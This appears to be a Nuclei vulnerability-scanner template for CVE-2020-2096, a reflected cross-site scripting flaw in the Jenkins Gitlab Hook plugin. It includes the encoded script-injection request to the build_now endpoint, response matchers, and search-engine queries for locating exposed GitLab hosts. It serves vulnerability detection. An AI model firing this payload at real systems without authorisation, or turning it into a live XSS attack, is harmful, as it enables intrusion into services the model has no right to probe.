58 lines
2.1 KiB
YAML
58 lines
2.1 KiB
YAML
id: CVE-2020-2096
|
|
|
|
info:
|
|
name: Jenkins Gitlab Hook <=1.4.2 - Cross-Site Scripting
|
|
author: madrobot
|
|
severity: medium
|
|
description: Jenkins Gitlab Hook 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected cross-site scripting vulnerability.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
|
|
remediation: |
|
|
Upgrade to the latest version of Jenkins Gitlab Hook plugin (>=1.4.3) to mitigate this vulnerability.
|
|
reference:
|
|
- https://jenkins.io/security/advisory/2020-01-15/#SECURITY-1683
|
|
- http://www.openwall.com/lists/oss-security/2020/01/15/1
|
|
- http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-2096
|
|
- https://github.com/Elsfa7-110/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2020-2096
|
|
cwe-id: CWE-79
|
|
epss-score: 0.96965
|
|
epss-percentile: 0.99727
|
|
cpe: cpe:2.3:a:jenkins:gitlab_hook:*:*:*:*:*:jenkins:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: jenkins
|
|
product: gitlab_hook
|
|
framework: jenkins
|
|
shodan-query:
|
|
- http.title:"GitLab"
|
|
- http.title:"gitlab"
|
|
fofa-query: title="gitlab"
|
|
google-query: intitle:"gitlab"
|
|
tags: cve2020,cve,jenkins,xss,gitlab,plugin,packetstorm
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022015c292aef1c4d365fcd2e72f60afb74732eac38b7be0d6ca10bae5ef6101fd1d022100e47267d0c42e5e411682c1f3087612ff9b37a650327192fbe2c63681d4003ad9:922c64590222798bb761d5b6d8e72950 |